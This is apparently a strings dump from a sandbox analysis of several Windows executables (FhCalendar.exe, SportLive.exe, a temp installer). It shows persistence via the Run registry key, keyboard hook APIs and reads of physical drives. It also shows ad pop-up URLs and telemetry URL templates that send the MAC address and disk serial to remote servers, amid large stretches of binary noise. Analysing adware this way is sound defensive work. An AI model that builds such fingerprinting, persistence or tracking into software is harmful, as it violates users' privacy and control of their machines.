S"S$S%S'S(S)S S,S-S/S0S1S2S3S4S5S6S7S8S<S><pre>U!U%U&U?</pre><pre>X"X#X%X&X'X(X)X X,X-X.X/X1X2X3X4X6X7X8X9X:X;X<X>X?X@XAXBXCXEXFXGXHXIXJXKXNXOXPXRXSXUXVXWXYXZX[X\X]X_X`XaXbXcXdXfXgXhXiXjXmXnXoXpXqXrXsXtXuXvXwXxXyXzX{X|X}X</X></pre><pre>_!_"_#_$_?</pre><pre>%d'd(d)d d.d/d0d1d2d3d5d6d7d8d9d;d<d>d@dBdCdIdKdLdMdNdOdPdQdSdUdVdWdYdZd[d\d]d_d`dadbdcdddedfdhdjdkdldndodpdqdrdsdtdudvdwd{d|d}d~d</d></pre><pre>"e#e$e&e'e(e)e*e,e-e0e1e2e3e7e:e<e><pre>"P%Q%R%S%T%U%V%W%X%Y%Z%[%\%]%^%_%`%a%b%c%d%e%f%g%h%i%j%k%l%m%n%o%p%q%r%s%</pre><pre>1 1!1"1#1$1%1&1'1(1)1</pre><pre>!0"0#0$0%0&0'0(0)0</pre><pre>% %!%"%#%$%%%&%'%(%)%*% %,%-%.%/%0%1%2%3%4%5%6%7%8%9%:%;%<%=%>%?%@%A%B%C%D%E%F%G%H%I%J%K%</pre><pre>W%f?i</pre><pre>e.lFO</pre><pre>}!}#}$}%}&}(})}*},}-}.}0}1}2}3}4}5}6}</pre><pre>urlsS</pre><pre>~ ~!~"~#~$~%~&~'~(~)~*~ ~,~-~.~/~0~1~2~3~4~5~6~7~8~9~?</pre><pre>u%urrGS</pre><pre>]']&].]$]</pre><pre>s"s9s%s,s8s1sPsMsWs`slsos~s</pre><pre>x<x%x><pre>{.{1{ {%{${3{>{</pre><pre>closeMiniUrl</pre><pre>closePopUrl</pre><pre>203.117.180.36</pre><pre>232,1!2@</pre><pre>e:\FhWork\Work\FhCalendar\Release\FhCalendar.pdb</pre><pre>KERNEL32.dll</pre><pre>GetKeyState</pre><pre>SetWindowsHookExW</pre><pre>UnhookWindowsHookEx</pre><pre>USER32.dll</pre><pre>GDI32.dll</pre><pre>RegCloseKey</pre><pre>RegOpenKeyExW</pre><pre>ADVAPI32.dll</pre><pre>ShellExecuteW</pre><pre>SHELL32.dll</pre><pre>ole32.dll</pre><pre>OLEAUT32.dll</pre><pre>COMCTL32.dll</pre><pre>UrlUnescapeW</pre><pre>SHLWAPI.dll</pre><pre>oledlg.dll</pre><pre>DuiLib_u.dll</pre><pre>WINMM.dll</pre><pre>WS2_32.dll</pre><pre>IPHLPAPI.DLL</pre><pre>InternetCrackUrlW</pre><pre>InternetCanonicalizeUrlW</pre><pre>InternetOpenUrlW</pre><pre>WININET.dll</pre><pre>OLEACC.dll</pre><pre>GetCPInfo</pre><pre>GetConsoleOutputCP</pre><pre>GetProcessHeap</pre><pre>CreateDialogIndirectParamW</pre><pre>GetViewportExtEx</pre><pre>SetViewportOrgEx</pre><pre>OffsetViewportOrgEx</pre><pre>SetViewportExtEx</pre><pre>ScaleViewportExtEx</pre><pre>WINSPOOL.DRV</pre><pre>COMDLG
32.dll</pre><pre>RegCreateKeyExW</pre><pre>RegDeleteKeyW</pre><pre>RegOpenKeyW</pre><pre>RegEnumKeyW</pre><pre>.PAVCOleException@@</pre><pre>.PAVCException@@</pre><pre>.PAVCObject@@</pre><pre>.PAVCMemoryException@@</pre><pre>.PAVCSimpleException@@</pre><pre>.PAVCNotSupportedException@@</pre><pre>.PAVCInvalidArgException@@</pre><pre>.?AVCNotSupportedException@@</pre><pre>.?AVCCmdUI@@</pre><pre>.?AVCHttpFile@@</pre><pre>.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@</pre><pre>.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@</pre><pre>.PAVCArchiveException@@</pre><pre>.PAVCResourceException@@</pre><pre>.PAVCUserException@@</pre><pre>.PAVCFileException@@</pre><pre>.?AVCTestCmdUI@@</pre><pre>.PAVCOleDispatchException@@</pre><pre>zcÁ</pre><pre>.?AVCCmdTarget@@</pre><pre>.PAVCInternetException@@</pre><pre>.?AVCMiniWebWnd@@</pre><pre>.?AVCPopWebWnd@@</pre><pre>.?AVCMD5@@</pre><pre>.?AVCMD5File@@</pre><pre>5*5)5*5)5*5)5*5)5*5)5*5)5*5)5*5)5*5*5)*4</pre><pre>!>qMRqqq=jqq;q@!!%dpRBepZpqeGe2!!</pre><pre><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></pre><pre><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Explorer</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Network</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32</pre><pre>ntdll.dll</pre><pre>kernel32.dll</pre><pre>%s%s.dll</pre><pre>A%s (%s:%d)</pre><pre>%s 
(%s:%d)</pre><pre>f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp</pre><pre>f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp</pre><pre>Acomctl32.dll</pre><pre>Acomdlg32.dll</pre><pre>Ashell32.dll</pre><pre>http://</pre><pre>@WININET.DLL</pre><pre>mfcm90u.dll</pre><pre>f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp</pre><pre>f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl</pre><pre>user32.dll</pre><pre>accKeyboardShortcut</pre><pre>f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl</pre><pre>commctrl_DragListMsg</pre><pre>f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filetxt.cpp</pre><pre>mscoree.dll</pre><pre>KERNEL32.DLL</pre><pre>xbasicSetting.xml</pre><pre>subdivis.db</pre><pre>timedate.cpl</pre><pre>http://www.fhrlw.com</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>S_11.png</pre><pre>S_22.png</pre><pre>clocknote_list_item.xml</pre><pre>{b}%s{/b}</pre><pre>%d-d-d d:d</pre><pre>pg1_operation_small</pre><pre>pg1_operation_big</pre><pre>{c #808080}%d-d-d d:d{/c}</pre><pre>index.png</pre><pre>index_1.png</pre><pre>clock_note_setting.xml</pre><pre>xfhnotetip.xml</pre><pre>menu.xml</pre><pre>Update.exe</pre><pre>Updatb.exe</pre><pre>Update_bak.exe</pre><pre>FMTest.exe</pre><pre>\FMDLL32.dll</pre><pre>FMDLL32.dll</pre><pre>GetMsgProc</pre><pre>xfh.xml</pre><pre>http://client.fhrlw.com/ad/shopping.html?id=%d</pre><pre>Skin\warn.wav</pre><pre>pg2_web</pre><pre>data.db</pre><pre>info.db</pre><pre>note.ini</pre><pre>%d-d-d</pre><pre>%d/d/d</pre><pre>%c%d%d%d</pre><pre>http://client.fhrlw.com/ad/fixad.html?id=%d</pre><pre>%s(%d/d/d)</pre><pre>clock_del_nor.png</pre><pre>clock_del_hov.png</pre><pre>clock_del_push.png</pre><pre>finish_nor.png</pre><pre>finish_hov.png</pre><pre>finish_push.png</pre><pre>%d-%d-%d</pre><pre>%c%d%d</pre><pre>jintian3.png</pre><pre>huangli.xml</pre><pre>%d-01-01</pre><pre>%s{n}</pre><pre>{c #ff0000}%d{/c}</pre><pre>{n}{c 
#ff0000}%s{/c}</pre><pre>http://client.fhrlw.com/Api/GetHoliday.ashx</pre><pre>http://client.fhrlw.com/Api/GetWeather.ashx?province=%s&city=%s</pre><pre>ohttp://client.fhrlw.com/Api/SendClickData.ashx?pid=%d&psid=%d&setupcode=%s&mac=%s&physn=%s&date=%s&clickcount1=%d&clickcount2=%d&clickcount3=%d&clickcount4=%d</pre><pre>http://client.fhrlw.com/Api/Sendndays2openData.ashx?pid=%d&psid=%d&setupcode=%s&mac=%s&physn=%s&ndays=%d</pre><pre>http://client.fhrlw.com/Api/getRightDownState.ashx?pid=%d&psid=%d&setupcode=%s&mac=%s&physn=%s</pre><pre>http://client.fhrlw.com/Api/onlineLength.ashx?pid=%d&psid=%d&setupcode=%s&mac=%s&physn=%s</pre><pre>http://client.fhrlw.com/api/GetConfig.ashx</pre><pre>xhlwnd.xml</pre><pre>EKey</pre><pre>dd</pre><pre>%s<n>%s</n></pre><pre><f 2="2">%s</f><n><f 2="2">%s</f></n></pre><pre>%Y-%m-%d %H:%M:%S</pre><pre>MiniWebWnd</pre><pre>xminiweb.xml</pre><pre>web_info</pre><pre>http://client.fhrlw.com/mini.html?id=%d</pre><pre>EPopWebWnd</pre><pre>xpopweb.xml</pre><pre>http://client.fhrlw.com/ad/popad.html?id=%d</pre><pre>\\.\PhysicalDrive%d</pre><pre>\\.\Scsi%d:</pre><pre>%%%2x</pre><pre>%Program Files%\fhrl\FhCalendar.exe</pre><pre>All Files (*.*)</pre><pre>No error message is available.#Attempted an unsupported operation.$A required resource was unavailable.</pre><pre>Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. 
This machine may have an incompatible version of %s.</pre><pre>Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else.1Encountered an unexpected error while reading %1.1Encountered an unexpected error while writing %1.</pre><pre>#Unable to load mail system support.</pre><pre>1.0.0.1</pre><pre>FhCalendar.exe</pre><b>MSIB.tmp_916:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.rsrc</pre><pre>@.reloc</pre><pre>KERNEL32.dll</pre><pre>ShellExecuteW</pre><pre>ShellExecuteExW</pre><pre>SHELL32.dll</pre><pre><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></pre><pre>11.0.0.0</pre><pre>viewer.exe</pre><b>SportLive.exe_908:</b><pre>.text</pre><pre>.rdata</pre><pre>.data</pre><pre>.rsrc</pre><pre>.reloc</pre><pre>.aspack</pre><pre>.adata</pre><pre>Pht%D</pre><pre>CCmdTarget</pre><pre>CNotSupportedException</pre><pre>hhctrl.ocx</pre><pre>f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl</pre><pre>commctrl_DragListMsg</pre><pre>f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl2.cpp</pre><pre>f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp</pre><pre>comctl32.dll</pre><pre>comdlg32.dll</pre><pre>shell32.dll</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Explorer</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Network</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32</pre><pre>ntdll.dll</pre><pre>kernel32.dll</pre><pre>%s%s.dll</pre><pre>f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp</pre><pre>mfcm90.dll</pre><pre>f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp</pre><pre>user32.dll</pre><pre>ole32.dll</pre><pre>Please contact the application's support team for more information.</pre><pre>- Attempt to initialize the CRT more than once.</pre><pre>- CRT not initialized</pre><pre>- floating point support not 
loaded</pre><pre>operator</pre><pre>GetProcessWindowStation</pre><pre>USER32.DLL</pre><pre>OLEACC.dll</pre><pre>\Liveconfig.ini</pre><pre>%A,%B,%d,%Y</pre><pre>D:\Program Files (x86)\Microsoft Visual Studio 9.0\VC\atlmfc\include\afxwin1.inl</pre><pre>%s (%s:%d)</pre><pre>images\tab_bg.png</pre><pre>images\tabclose1.png</pre><pre>images\tabclose2.png</pre><pre>images\tabclose3.png</pre><pre>images\tab_item1.png</pre><pre>images\tab_item2.png</pre><pre>images\tab_item3.png</pre><pre>http://sport.yuejan.com/online/html/events/ad.html</pre><pre>http://sport.yuejan.com/online/html/events/event.html</pre><pre>sports.cntv.cn</pre><pre>tv.cntv.cn</pre><pre>apps.sports.cntv.cn</pre><pre>live.video.sina.com.cn/room/</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>KeyName=%s</pre><pre>\\.\PhysicalDrive%d</pre><pre>X-X-X-X-X-X</pre><pre>%Program Files%\xxss.ini</pre><pre>http://dif.9yfc.com/cloudy/iau.xhtml?op=active&st=1&ma=</pre><pre>CWebPage</pre><pre>F:\project\SprotLive\Release\</pre><pre>GetCPInfo</pre><pre>GetConsoleOutputCP</pre><pre>KERNEL32.dll</pre><pre>CreateDialogIndirectParamA</pre><pre>GetKeyState</pre><pre>UnhookWindowsHookEx</pre><pre>SetWindowsHookExA</pre><pre>USER32.dll</pre><pre>GetViewportExtEx</pre><pre>SetViewportOrgEx</pre><pre>OffsetViewportOrgEx</pre><pre>SetViewportExtEx</pre><pre>ScaleViewportExtEx</pre><pre>GDI32.dll</pre><pre>COMDLG32.dll</pre><pre>WINSPOOL.DRV</pre><pre>RegCreateKeyExA</pre><pre>RegCloseKey</pre><pre>RegOpenKeyExA</pre><pre>RegOpenKeyA</pre><pre>RegDeleteKeyA</pre><pre>RegEnumKeyA</pre><pre>ADVAPI32.dll</pre><pre>SHELL32.dll</pre><pre>COMCTL32.dll</pre><pre>SHLWAPI.dll</pre><pre>oledlg.dll</pre><pre>OLEAUT32.dll</pre><pre>gdiplus.dll</pre><pre>IPHLPAPI.DLL</pre><pre>GetProcessHeap</pre><pre>.?AVCCmdUI@@</pre><pre>.PAVCMemoryException@@</pre><pre>.PAVCSimpleException@@</pre><pre>.PAVCObject@@</pre><pre>.PAVCNotSupportedException@@</pre><pre>.PAVCInvalidArgException@@</pre><pre>.?AVCNotSupportedException@@</pre><p
re>.?AVCTestCmdUI@@</pre><pre>.PAVCUserException@@</pre><pre>.PAVCOleException@@</pre><pre>.PAVCOleDispatchException@@</pre><pre>.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@</pre><pre>.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@</pre><pre>.PAVCResourceException@@</pre><pre>.PAVCArchiveException@@</pre><pre>.PAVCFileException@@</pre><pre>zcÁ</pre><pre>.?AVCCmdTarget@@</pre><pre>.PAVCException@@</pre><pre>.?AVCWebPage@@</pre><pre>%Program Files%\xxdd\SportLive.exe</pre><pre>%Program Files%\xxdd\Liveconfig.ini</pre><pre>jJs%C*</pre><pre>9D<.KA</pre><pre>Tev%CP</pre><pre>K p<<c.sL</pre><pre>%F-yg</pre><pre>^L)%X,</pre><pre>.fQEC)</pre><pre>k.KKS</pre><pre>`t":.rZ"</pre><pre>.UH8&</pre><pre>h%F& t</pre><pre>*.Aqr</pre><pre>%F-<K><pre>%D-<K><pre>.XXPmUx</pre><pre>8.Da`</pre><pre>5.lbK</pre><pre>K5.Ac</pre><pre>!,.WD</pre><pre>x.Dzu</pre><pre>.ZO $r</pre><pre>jsF%f</pre><pre>B.bc'</pre><pre>lX%S:Gm</pre><pre>Sò/</pre><pre>R<#D.Lps</pre><pre>ò4 </pre><pre>.hfpv/m</pre><pre>.gAP]y</pre><pre>%CR-<</pre><pre>2R.bz</pre><pre>mQh%x</pre><pre>.LTb`</pre><pre>esQLo</pre><pre>aQt.bp</pre><pre>|5%s'</pre><pre>;.FE~</pre><pre>Ji%fG</pre><pre>.MyS!</pre><pre>%dL<K><pre>c.UnG</pre><pre>N9.HG*f</pre><pre>&s%U2N</pre><pre>a#^L%C^,$k</pre><pre>oA.tc2&</pre><pre>c.GWC/B</pre><pre>.Tl2P</pre><pre>22=.pA</pre><pre>')KEY$</pre><pre>Sj Þ^J</pre><pre>q%XMs</pre><pre>H.fb:</pre><pre>S%S6E</pre><pre>v:yu%f</pre><pre>.UrZk</pre><pre>xQi@%X</pre><pre>.DlDR</pre><pre>Z6.af}7E</pre><pre>i]}sGtCp</pre><pre>%C'E}</pre><pre>n".HbU</pre><pre>N9Y%D</pre><pre>EOO .lj</pre><pre>1.ndY</pre><pre>.trQQ</pre><pre>2\AýD</pre><pre>-%%u(</pre><pre>rM.en</pre><pre>,V.DfB</pre><pre>",Í</pre><pre>g.Ov[*g</pre><pre>P%UX:u</pre><pre>s.tqe</pre><pre>eR.iQ</pre><pre>Mq.FlO4</pre><pre>.fL$V</pre><pre>J.Tj@</pre><pre>.dT}<</pre><pre>1Et 
ß</pre><pre>%s%:k</pre><pre>mP.pO</pre><pre>LT&4X.LQ<</pre><pre>.ewFy</pre><pre>w.VUO</pre><pre>!l<L><pre>x`%C$</pre><pre>wV5_U%u</pre><pre>r7.kJ</pre><pre>5.zOE=</pre><pre>.K.Uq</pre><pre>Y.fl|</pre><pre>Af.hd=</pre><pre>p%XD@</pre><pre>.nfqi</pre><pre>/k.qa</pre><pre>S%d#/</pre><pre> 'Q%s</pre><pre>Pw.QC</pre><pre>[ya3K%u</pre><pre>^L%9X-,</pre><pre>%Do,}</pre><pre>v/%x s</pre><pre>%&%.xN</pre><pre>9!%u _)</pre><pre>%sOeK#</pre><pre>L.hDX</pre><pre>(%.Lj</pre><pre>%d,$k</pre><pre>SQ%S"{3</pre><pre>-.Qg=</pre><pre>@.iT'P</pre><pre>x .Xs</pre><pre>}U-j} </pre><pre>2&2tF%FS</pre><pre>MCRT</pre><pre>^J}%f,<</pre><pre>gA[a%x@</pre><pre>.bwrxR</pre><pre>1V.Tz</pre><pre>YK%UL</pre><pre>)h.OY</pre><pre>.vJcw</pre><pre>o.BJ2</pre><pre>E;.SMS</pre><pre>%C\,<</pre><pre>@I*ËBM</pre><pre>R..xu</pre><pre>ÞlE></pre><pre>%fl k</pre><pre>m.Vbu</pre><pre>,(%u0</pre><pre>.Tk>X</pre><pre>.doBn</pre><pre>Bv%%f</pre><pre>%f,,k</pre><pre>*.Qg9bif</pre><pre>.TT=U</pre><pre>tB.pl</pre><pre>D=.ST</pre><pre>È '[</pre><pre>dy%XY</pre><pre>.TKyq</pre><pre>AE.wL</pre><pre>f0'.Pe</pre><pre>%UtD%</pre><pre>LG7%u</pre><pre>%1U8*></pre><pre>JG$.Ir</pre><pre>^KI%dL<k><pre>_.zY^</pre><pre>#e#b.ig</pre><pre>.DQ:DI</pre><pre>@xdH</pre><pre>C7%c:#</pre><pre>^K%CV,</pre><pre>~.GlkXAV</pre><pre>lSqL</pre><pre>GM.fG^`</pre><pre>C3.tH</pre><pre>N#KEy</pre><pre>sL%SY:3'</pre><pre>u:\^q</pre><pre>~.Lz/;"%</pre><pre>U%d.PVS</pre><pre>8.axb</pre><pre>1[s%D</pre><pre>`#?eXe</pre><pre>cúo</pre><pre>%XH\XzT"</pre><pre>.pQF(</pre><pre>LI%X-@</pre><pre>d.KM/</pre><pre>.gdGT1</pre><pre>Qx.KP</pre><pre>%f,}vh</pre><pre>uuBTcpaB</pre><pre>\R%DhG</pre><pre>jSLJJik.BCV</pre><pre>luRl</pre><pre>V(]E.ie</pre><pre>7!.va</pre><pre>X|I.Xiky</pre><pre>)Y.iu</pre><pre>LMSg</pre><pre>Eq0%X</pre><pre>$scm%X</pre><pre>%F Q21Sm</pre><pre>30}L2</pre><pre>K-a}BD;</pre><pre>zH.lG</pre><pre>!H8UX%s</pre><pre>4]j%7Uu</pre><pre>Wj.bL</pre><pre>.xzev</pre><pre>Xiy%x</pre><pre>%dL$k</pre><pre>O$Ç</pre><pre>v> 
.bt</pre><pre>wdGwG%s</pre><pre>%8x."@</pre><pre>.aK>5</pre><pre>^JÏL</pre><pre>:Vk.Tl</pre><pre>a.EDY</pre><pre>.gQ&c</pre><pre>Kg.MFQZ</pre><pre>r.aK;</pre><pre>4.qrq</pre><pre>7333332</pre><pre>OU)>M</pre><pre>.uUUs</pre><pre>.UVVg</pre><pre>aKi.Xa</pre><pre>Q )Odc.eff</pre><pre>ee%.s)</pre><pre>f.mAYU</pre><pre>d.UVK</pre><pre>c%cRU[</pre><pre>%x< *</pre><pre>h:\J[</pre><pre>)%fl$K</pre><pre>Ay.KV</pre><pre>%Xa(_</pre><pre>b/(%XD</pre><pre>1.Tb2</pre><pre>.Ds3E<</pre><pre>.jL`Oz_</pre><pre>E.EGF</pre><pre>^KuMsG</pre><pre>.MF;e</pre><pre>%dL4k</pre><pre>m%fL4K</pre><pre>%9S.<</pre><pre>9 .ud</pre><pre>#.bIA</pre><pre>QJ%4s</pre><pre>0~.Au</pre><pre>W/%Ut</pre><pre>!=%DG</pre><pre>)(@:::5%</pre><pre>CRP%x</pre><pre>{IjP.tk%</pre><pre>%Ck\3R</pre><pre>%fl4K</pre><pre>H6).nO</pre><pre>.VD8VEmg K</pre><pre>Q=f\LA%f</pre><pre>iXZ.td EJ</pre><pre>Ppr-5P}</pre><pre>#Ha%CQf</pre><pre>I-f}3</pre><pre>f#|</pre><pre>QV.bp</pre><pre>%URiz</pre><pre>.EEr8</pre><pre>q.iQf</pre><pre>C.SJw </pre><pre>.qsn8q</pre><pre>.BS=uV</pre><pre>.dL9)</pre><pre>I%dl4</pre><pre>9%fU/</pre><pre>_J@%D</pre><pre>".DZ(</pre><pre>ZH.GP</pre><pre>Nzl%uu</pre><pre>.qHF^</pre><pre>|I.qh</pre><pre>,b50z3.Bq</pre><pre>.CWU!</pre><pre>.DfTb]</pre><pre>.it-&D? 
</pre><pre>q&.id</pre><pre>Mj.gv</pre><pre>^k.uH$</pre><pre>\Ku%d</pre><pre>%x-@D</pre><pre>?5.MS</pre><pre>.hU&W</pre><pre>/.xVy</pre><pre>Ë d</pre><pre>.qQGFG</pre><pre>b'Ä</pre><pre>.UHf5 1</pre><pre>Wk"@.Xg</pre><pre>{>.sN<n%><pre>(.Bpr</pre><pre>%dL@k</pre><pre>.Ptj?</pre><pre>G%xu)F</pre><pre>url\{X</pre><pre>`2.TEHR</pre><pre>?Bx%F</pre><pre>%u$qP</pre><pre>4U5.Wm</pre><pre>1M.dWa</pre><pre>wA.IL</pre><pre>;P"F%C</pre><pre>.Ul56</pre><pre>f.ZqB</pre><pre>.du)@</pre><pre>Vm.dv:Q</pre><pre>nf.MI</pre><pre>oOuk)s{%U[</pre><pre>.rXW(</pre><pre>:%2x\D</pre><pre>z%djt</pre><pre>)).RwS</pre><pre>-z}s-]</pre><pre>%xQ#Y</pre><pre>(t %fN</pre><pre>%c-V,</pre><pre>#%CX\</pre><pre>q"Y.uPbXk</pre><pre>}.YRr</pre><pre>J(B/.Tv</pre><pre>5%dur</pre><pre>.bsf`?</pre><pre>)%d,<</pre><pre>Rb.ht</pre><pre>Q.AV#</pre><pre>"zO%f</pre><pre>A"p</pre><pre>.osWF</pre><pre>?.yy@</pre><pre>W%cpA</pre><pre>c.Yvhr</pre><pre>.bfAAN?</pre><pre>^Jq%d</pre><pre>\:%x"</pre><pre>Vj/n%fg</pre><pre>&]D'%fp</pre><pre>;'k%d~</pre><pre>iho.TH</pre><pre>|d.EH</pre><pre>w.gNY</pre><pre>.bl0Z</pre><pre>RP%D`</pre><pre>.VyKe</pre><pre>C.bbL$</pre><pre>qF%D$</pre><pre>R7X`%c</pre><pre>h=.QT</pre><pre>V(j{%S</pre><pre>&@M</pre><pre>eWEb</pre><pre>a.Lt></pre><pre>:4.MIcX</pre><pre>y.lT\n</pre><pre>%E.oI</pre><pre>D1%Dr</pre><pre>;Mn%F</pre><pre>}F%5S\</pre><pre>-Bi}M9</pre><pre>P].yv</pre><pre>~.rl^</pre><pre>VLn;P.au</pre><pre>.IoK(</pre><pre>7uu</pre><pre>Q:\2y</pre><pre>@.cSx8H\</pre><pre>6qN%U</pre><pre>46.wjJ</pre><pre>iTXtXML:com.adobe.xmp</pre><pre>" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" 
xmpMM:InstanceID="xmp.iid:1405FFA5061411E3A66E8352AA12703D" xmpMM:DocumentID="xmp.did:1405FFA6061411E3A66E8352AA12703D"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:1405FFA3061411E3A66E8352AA12703D" stRef:documentID="xmp.did:1405FFA4061411E3A66E8352AA12703D" /> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?></pre><pre>.Twyy</pre><pre>" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmpMM:InstanceID="xmp.iid:CDA243D50BBA11E3BD1B8399A9672FB8" xmpMM:DocumentID="xmp.did:CDA243D60BBA11E3BD1B8399A9672FB8"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:CDA243D30BBA11E3BD1B8399A9672FB8" stRef:documentID="xmp.did:CDA243D40BBA11E3BD1B8399A9672FB8" /> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>Thz5</pre><pre>diTXtXML:com.adobe.xmp</pre><pre>" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:6813E5CB910BE31191A789C5D0E269E2" xmpMM:DocumentID="xmp.did:EB6F6CFF0BBC11E3AE59D4B86C485946" xmpMM:InstanceID="xmp.iid:EB6F6CFE0BBC11E3AE59D4B86C485946" xmp:CreatorTool="Adobe Photoshop CS5 Windows"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:6813E5CB910BE31191A789C5D0E269E2" stRef:documentID="xmp.did:6813E5CB910BE31191A789C5D0E269E2" /> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?></pre><pre>" 
id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmpMM:InstanceID="xmp.iid:F61CD52B0BBA11E39778AEF7B3A21195" xmpMM:DocumentID="xmp.did:F61CD52C0BBA11E39778AEF7B3A21195"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:F61CD5290BBA11E39778AEF7B3A21195" stRef:documentID="xmp.did:F61CD52A0BBA11E39778AEF7B3A21195" /> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?></pre><pre>" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmpMM:InstanceID="xmp.iid:690E21BC1E8111E3890F9E8C651F0308" xmpMM:DocumentID="xmp.did:690E21BD1E8111E3890F9E8C651F0308"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:690E21BA1E8111E3890F9E8C651F0308" stRef:documentID="xmp.did:690E21BB1E8111E3890F9E8C651F0308" /> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>=</pre><pre>" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" 
